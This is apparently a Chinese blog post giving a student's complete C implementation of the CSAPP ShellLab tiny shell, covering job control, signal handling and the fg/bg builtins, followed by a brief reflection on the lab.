struct job_t {              /* The job struct */
    pid_t pid;              /* job PID */
    int jid;                /* job ID [1, 2, ...] */
    int state;              /* UNDEF, BG, FG, or ST */
    char cmdline[MAXLINE];  /* command line */
};
struct job_t jobs[MAXJOBS]; /* The job list */
/* End global variables */


/* Function prototypes */

/* Here are the functions that you will implement */
void eval(char *cmdline);
int builtin_cmd(char **argv);
void do_bgfg(char **argv);
void waitfg(pid_t pid);

void sigchld_handler(int sig);
void sigtstp_handler(int sig);
void sigint_handler(int sig);

/* Here are helper routines that we've provided for you */
int parseline(const char *cmdline, char **argv); 
void sigquit_handler(int sig);

void clearjob(struct job_t *job);
void initjobs(struct job_t *jobs);
int maxjid(struct job_t *jobs); 
int addjob(struct job_t *jobs, pid_t pid, int state, char *cmdline);
int deletejob(struct job_t *jobs, pid_t pid); 
pid_t fgpid(struct job_t *jobs);
struct job_t *getjobpid(struct job_t *jobs, pid_t pid);
struct job_t *getjobjid(struct job_t *jobs, int jid); 
int pid2jid(pid_t pid); 
void listjobs(struct job_t *jobs);

void usage(void);
void unix_error(char *msg);
void app_error(char *msg);
typedef void handler_t(int);
handler_t *Signal(int signum, handler_t *handler);

/* Self-defining function */
pid_t Fork(void);
void Sigprocmask(int how, const sigset_t* set, sigset_t* oldset);
void Sigemptyset(sigset_t* set);
void Sigfillset(sigset_t* set);
void Sigaddset(sigset_t* set, int signum);
void Sigdelset(sigset_t* set, int signum);

/*
 * main - The shell's main routine 
 */
int main(int argc, char** argv)
{
    char c;
    char cmdline[MAXLINE];
    int emit_prompt = 1; /* emit prompt (default) */

    /* Redirect stderr to stdout (so that driver will get all output
     * on the pipe connected to stdout) */
    dup2(1, 2);

    /* Parse the command line */
    while ((c = getopt(argc, argv, "hvp")) != EOF) {
        switch (c) {
        case 'h':             /* print help message */
            usage();
            break;
        case 'v':             /* emit additional diagnostic info */
            verbose = 1;
            break;
        case 'p':             /* don't print a prompt */
            emit_prompt = 0;  /* handy for automatic testing */
            break;
        default:
            usage();
        }
    }

    /* Install the signal handlers */

    /* These are the ones you will need to implement */
    Signal(SIGINT, sigint_handler);   /* ctrl-c */
    Signal(SIGTSTP, sigtstp_handler);  /* ctrl-z */
    Signal(SIGCHLD, sigchld_handler);  /* Terminated or stopped child */

    /* This one provides a clean way to kill the shell */
    Signal(SIGQUIT, sigquit_handler);

    /* Initialize the job list */
    initjobs(jobs);

    /* Execute the shell's read/eval loop */
    while (1) {

        /* Read command line */
        if (emit_prompt) {
            printf("%s", prompt);
            fflush(stdout);
        }
        if ((fgets(cmdline, MAXLINE, stdin) == NULL) && ferror(stdin))
            app_error("fgets error");
        if (feof(stdin)) { /* End of file (ctrl-d) */
            fflush(stdout);
            exit(0);
        }

        /* Evaluate the command line */
        eval(cmdline);
        fflush(stdout);
        fflush(stdout);
    }

    exit(0); /* control never reaches here */
}
  
/* 
 * eval - Evaluate the command line that the user has just typed in
 * 
 * If the user has requested a built-in command (quit, jobs, bg or fg)
 * then execute it immediately. Otherwise, fork a child process and
 * run the job in the context of the child. If the job is running in
 * the foreground, wait for it to terminate and then return.  Note:
 * each child process must have a unique process group ID so that our
 * background children don't receive SIGINT (SIGTSTP) from the kernel
 * when we type ctrl-c (ctrl-z) at the keyboard.  
*/
void eval(char *cmdline) 
{   
    char* argv[MAXARGS];            /* Argument list execve() */
    char buf[MAXLINE];              /* Holds modified command line */
    int bg, state;                  /* Should the job run in bg or fg? */
    pid_t pid;                      /* Process id */
    sigset_t mask_one, mask_all, prev_one;

    Sigemptyset(&mask_one);
    Sigaddset(&mask_one, SIGCHLD);
    Sigfillset(&mask_all);

    strcpy(buf, cmdline);
    bg = parseline(buf, argv);
    if (argv[0] == NULL)            /* Ignore empty lines */
        return;     

    if (!builtin_cmd(argv)) {
        Sigprocmask(SIG_SETMASK, &mask_one, &prev_one);

        if ((pid = Fork()) == 0) {  /* Child runs user job */
            Sigprocmask(SIG_SETMASK, &prev_one, NULL);
            setpgid(0, 0);
            if (execve(argv[0], argv, environ) < 0) {
                printf("%s: Command not found.\n", argv[0]);
                exit(0);
            }
        }

        state = bg ? BG : FG;
           
        /* Block all signals.This process cannot be interrupted */
        Sigprocmask(SIG_SETMASK, &mask_all, NULL);
        addjob(jobs, pid, state, cmdline);
        Sigprocmask(SIG_SETMASK, &prev_one, NULL);

        /* Parent waits for foreground job to terminate */
        if (bg) {
            printf("[%d] (%d) %s", pid2jid(pid), pid, cmdline);
        }
        else waitfg(pid);     
    }
    else {      /* builtin command */
        if (!strcmp(argv[0], "jobs"))
            listjobs(jobs);
        else do_bgfg(argv);
    }

    return;
}


/* 
 * parseline - Parse the command line and build the argv array.
 * 
 * Characters enclosed in single quotes are treated as a single
 * argument.  Return true if the user has requested a BG job, false if
 * the user has requested a FG job.  
 */
int parseline(const char* cmdline, char** argv)
{
    static char array[MAXLINE]; /* holds local copy of command line */
    char* buf = array;          /* ptr that traverses command line */
    char* delim;                /* points to first space delimiter */
    int argc;                   /* number of args */
    int bg;                     /* background job? */

    strcpy(buf, cmdline);
    buf[strlen(buf) - 1] = ' ';  /* replace trailing '\n' with space */
    while (*buf && (*buf == ' ')) /* ignore leading spaces */
        buf++;

    /* Build the argv list */
    argc = 0;
    if (*buf == '\'') {
        buf++;
        delim = strchr(buf, '\'');
    }
    else {
        delim = strchr(buf, ' ');
    }

    while (delim) {
        argv[argc++] = buf;
        *delim = '\0';
        buf = delim + 1;
        while (*buf && (*buf == ' ')) /* ignore spaces */
            buf++;

        if (*buf == '\'') {
            buf++;
            delim = strchr(buf, '\'');
        }
        else {
            delim = strchr(buf, ' ');
        }
    }
    argv[argc] = NULL;

    if (argc == 0)  /* ignore blank line */
        return 1;

    /* should the job run in the background? */
    if ((bg = (*argv[argc - 1] == '&')) != 0) {
        argv[--argc] = NULL;
    }
    return bg;
}

/* 
 * builtin_cmd - If the user has typed a built-in command then execute
 *    it immediately.  
 */
int builtin_cmd(char **argv) 
{
    if (!strcmp(argv[0], "quit"))
        exit(0);
    if (!strcmp(argv[0], "jobs"))
        return 1;
    if (!strcmp(argv[0], "fg"))
        return 1;
    if (!strcmp(argv[0], "bg"))
        return 1;
    return 0;     /* not a builtin command */
}

/* 
 * do_bgfg - Execute the builtin bg and fg commands
 */
void do_bgfg(char **argv) 
{
    int jid = 0, pid = 0, isFG = 0;
    char* cp;
    struct job_t* job = NULL;

    /* Should the job run in bg or fg? */
    isFG = (!strcmp(argv[0], "fg")) ? 1 : 0;

    if (argv[1] == NULL) {  /* Parameter missing */
        if (isFG)
            printf("fg command requires PID or %%jobid argument\n");
        else
            printf("bg command requires PID or %%jobid argument\n");
        return;
    }

    cp = argv[1];
    if (cp[0] == '%') { /* The number stands for jid */
        cp++;
        /* Check whether the ID is valid */
        for (char* tmp = cp; *tmp != '\0'; tmp++) {
            if (*tmp < '0' || *tmp > '9') {
                if (isFG)
                    printf("fg: argument must be a PID or %%jobid\n");
                else
                    printf("bg: argument must be a PID or %%jobid\n");
                return;
            }
        }
        jid = atoi(cp);
        job = getjobjid(jobs, jid);
    }
    else {              /* The number stands for pid */
        /* Check whether the ID is valid */
        for (char* tmp = cp; *tmp != '\0'; tmp++) {
            if (*tmp < '0' || *tmp > '9') {
                if (isFG)
                    printf("fg: argument must be a PID or %%jobid\n");
                else
                    printf("bg: argument must be a PID or %%jobid\n");
                return;
            }
        }
        pid = atoi(cp);
        job = getjobpid(jobs, pid);
    }

    if (job == NULL) {
        if (argv[1][0] == '%')
            printf("%%%d: No such job\n", jid);
        else
            printf("(%d): No such process\n", pid);
        return;
    }

    /* Since we want to put the process in the 
    foreground or background, restart it if it was stopped */
    kill(-job->pid, SIGCONT);

    if (isFG) {
        job->state = FG;
        waitfg(job->pid);
    }
    else {
        printf("[%d] (%d) %s", job->jid, job->pid, job->cmdline);
        job->state = BG;
    }
    
}

/* 
 * waitfg - Block until process pid is no longer the foreground process
 */
void waitfg(pid_t pid)
{
    sigset_t mask;

    /* Any signal will wake up the process */
    Sigemptyset(&mask);

    /* As long as there are foreground processes running, sleep */
    while (fgpid(jobs) > 0) {
        sigsuspend(&mask);
    }
}

/*****************
 * Signal handlers
 *****************/

/* 
 * sigchld_handler - The kernel sends a SIGCHLD to the shell whenever
 *     a child job terminates (becomes a zombie), or stops because it
 *     received a SIGSTOP or SIGTSTP signal. The handler reaps all
 *     available zombie children, but doesn't wait for any other
 *     currently running children to terminate.  
 */
void sigchld_handler(int sig) 
{
    pid_t pid;
    int status, olderrno = errno;
    sigset_t mask_all, prev_all;

    Sigfillset(&mask_all);

    /* The next step may involves deleting the job and cannot be interrupted */
    Sigprocmask(SIG_BLOCK, &mask_all, &prev_all);
    while ((pid = waitpid(-1, &status, WNOHANG | WUNTRACED)) > 0) {
        
        struct job_t* job = getjobpid(jobs, pid);

        /* The program runs normally */
        if (WIFEXITED(status)) {
            deletejob(jobs, pid);
        }
        /* Been suspended */
        else if (WIFSTOPPED(status)) {
            printf("Job [%d] (%d) stopped by signal %d\n", job->jid, job->pid, WSTOPSIG(status));
            job->state = ST;
        }
        /* Be terminated */
        else if (WIFSIGNALED(status)) {
            printf("Job [%d] (%d) terminated by signal %d\n", job->jid, job->pid, WTERMSIG(status));
            deletejob(jobs, pid);
        }
    }
    Sigprocmask(SIG_SETMASK, &prev_all, NULL);

    errno = olderrno;

    return;
}

/* 
 * sigint_handler - The kernel sends a SIGINT to the shell whenver the
 *    user types ctrl-c at the keyboard.  Catch it and send it along
 *    to the foreground job.  
 */
void sigint_handler(int sig) 
{
    int olderrno = errno;

    pid_t pid = fgpid(jobs);
    if (pid != 0)
        kill(-pid, SIGINT);
    else printf("No foreground job is running!\n");

    errno = olderrno;
}

/*
 * sigtstp_handler - The kernel sends a SIGTSTP to the shell whenever
 *     the user types ctrl-z at the keyboard. Catch it and suspend the
 *     foreground job by sending it a SIGTSTP.  
 */
void sigtstp_handler(int sig) 
{
    int olderrno = errno;

    pid_t pid = fgpid(jobs);
    if (pid != 0)
        kill(-pid, SIGTSTP);
    else printf("No foreground job is running!\n");

    errno = olderrno;
}

/*********************
 * End signal handlers
 *********************/

/***********************************************
 * Helper routines that manipulate the job list
 **********************************************/

/* clearjob - Clear the entries in a job struct */
void clearjob(struct job_t *job) {
    job->pid = 0;
    job->jid = 0;
    job->state = UNDEF;
    job->cmdline[0] = '\0';
}

/* initjobs - Initialize the job list */
void initjobs(struct job_t *jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
    clearjob(&jobs[i]);
}

/* maxjid - Returns largest allocated job ID */
int maxjid(struct job_t *jobs) 
{
    int i, max=0;

    for (i = 0; i < MAXJOBS; i++)
    if (jobs[i].jid > max)
        max = jobs[i].jid;
    return max;
}

/* addjob - Add a job to the job list */
int addjob(struct job_t *jobs, pid_t pid, int state, char *cmdline) 
{
    int i;
    
    if (pid < 1)
    return 0;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid == 0) {
            jobs[i].pid = pid;
            jobs[i].state = state;
            jobs[i].jid = nextjid++;
            if (nextjid > MAXJOBS)
            nextjid = 1;
            strcpy(jobs[i].cmdline, cmdline);
            if(verbose){
                printf("Added job [%d] %d %s\n", jobs[i].jid, jobs[i].pid, jobs[i].cmdline);
            }
            return 1;
        }
    }
    printf("Tried to create too many jobs\n");
    return 0;
}

/* deletejob - Delete a job whose PID=pid from the job list */
int deletejob(struct job_t *jobs, pid_t pid) 
{
    int i;

    if (pid < 1)
    return 0;

    for (i = 0; i < MAXJOBS; i++) {
    if (jobs[i].pid == pid) {
        clearjob(&jobs[i]);
        nextjid = maxjid(jobs)+1;
        return 1;
    }
    }
    return 0;
}

/* fgpid - Return PID of current foreground job, 0 if no such job */
pid_t fgpid(struct job_t *jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
    if (jobs[i].state == FG)
        return jobs[i].pid;
    return 0;
}

/* getjobpid  - Find a job (by PID) on the job list */
struct job_t *getjobpid(struct job_t *jobs, pid_t pid) {
    int i;

    if (pid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].pid == pid)
            return &jobs[i];
    return NULL;
}

/* getjobjid  - Find a job (by JID) on the job list */
struct job_t *getjobjid(struct job_t *jobs, int jid) 
{
    int i;

    if (jid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid == jid)
            return &jobs[i];
    return NULL;
}

/* pid2jid - Map process ID to job ID */
int pid2jid(pid_t pid) 
{
    int i;

    if (pid < 1)
    return 0;
    for (i = 0; i < MAXJOBS; i++)
    if (jobs[i].pid == pid) {
            return jobs[i].jid;
        }
    return 0;
}

/* listjobs - Print the job list */
void listjobs(struct job_t *jobs) 
{
    int i;
    
    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid != 0 && jobs[i].state != FG) {
            printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
            switch (jobs[i].state) {
            case BG: 
                printf("Running ");
                break;
            case ST: 
                printf("Stopped ");
                break;
            default:
                printf("listjobs: Internal error: job[%d].state=%d ", 
                   i, jobs[i].state);
            }
            printf("%s", jobs[i].cmdline);
        }
    }
}
/******************************
 * end job list helper routines
 ******************************/


/***********************
 * Other helper routines
 ***********************/

/*
 * usage - print a help message
 */
void usage(void) 
{
    printf("Usage: shell [-hvp]\n");
    printf("   -h   print this message\n");
    printf("   -v   print additional diagnostic information\n");
    printf("   -p   do not emit a command prompt\n");
    exit(1);
}

/*
 * unix_error - unix-style error routine
 */
void unix_error(char *msg)
{
    fprintf(stdout, "%s: %s\n", msg, strerror(errno));
    exit(1);
}

/*
 * app_error - application-style error routine
 */
void app_error(char *msg)
{
    fprintf(stdout, "%s\n", msg);
    exit(1);
}

/*
 * Signal - wrapper for the sigaction function
 */
handler_t *Signal(int signum, handler_t *handler) 
{
    struct sigaction action, old_action;

    action.sa_handler = handler;  
    sigemptyset(&action.sa_mask); /* block sigs of type being handled */
    action.sa_flags = SA_RESTART; /* restart syscalls if possible */

    if (sigaction(signum, &action, &old_action) < 0)
    unix_error("Signal error");
    return (old_action.sa_handler);
}

/*
 * sigquit_handler - The driver program can gracefully terminate the
 *    child shell by sending it a SIGQUIT signal.
 */
void sigquit_handler(int sig) 
{
    printf("Terminating after receipt of SIGQUIT signal\n");
    exit(1);
}

/*************************
 * Self-defining function
 *************************/

pid_t Fork(void)
{
    pid_t pid;

    if ((pid = fork()) < 0) {
        unix_error("Fork error");
    }
    return pid;
}

void Sigprocmask(int how, const sigset_t* set, sigset_t* oldset)
{
    if (sigprocmask(how, set, oldset) < 0)
        unix_error("Sigprocmask error");
}

void Sigemptyset(sigset_t* set)
{
    if (sigemptyset(set) < 0)
        unix_error("Sigemptyset error");
}

void Sigfillset(sigset_t* set)
{
    if (sigfillset(set) < 0)
        unix_error("Sigfillset error");
}

void Sigaddset(sigset_t* set, int signum)
{
    if (sigaddset(set, signum) < 0)
        unix_error("Sigaddset error");
}

void Sigdelset(sigset_t* set, int signum)
{
    if (sigdelset(set, signum) < 0)
        unix_error("Sigdelset error");
}

小结

本实验难度不很大，设计严谨，要求能灵活运用第八章所学知识，是一个非常优秀的实验。2021/8/29做了一整天基本完成，对真是shell背后的原理有了更深刻的了解

MallocLab & ProxyLab

没做，以后（看情况）实现

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 214,377评论 6赞 496
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 91,390评论 3赞 389
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 159,967评论 0赞 349
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 57,344评论 1赞 288
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 66,441评论 6赞 386
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 50,492评论 1赞 292
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 39,497评论 3赞 412
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 38,274评论 0赞 269
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 44,732评论 1赞 307
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 37,008评论 2赞 328
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 39,184评论 1赞 342
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 34,837评论 4赞 337
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 40,520评论 3赞 322
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 31,156评论 0赞 21
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 32,407评论 1赞 268
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 47,056评论 2赞 365
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 44,074评论 2赞 352

CSAPP-Labs_part2

ArchitectureLab

准备

Part A

sum.ys

rsum.ys

copy.ys

Part B

Part C

小结

AttackLab

Level 1

Level 2

Level 3

Level 2

Level 3

小结

CacheLab

Part A

Part B

32 x 32

64 x 64

61 x 67

最终结果

小结

PerformanceLab

ShellLab

trace01

trace02

trace03

trace04

trace05

trace06

trace07

trace08

trace09 & trace10

trace11 & trace 12

trace13 & trace 14 & trace15 & trace16

完整代码

小结

MallocLab & ProxyLab

推荐阅读更多精彩内容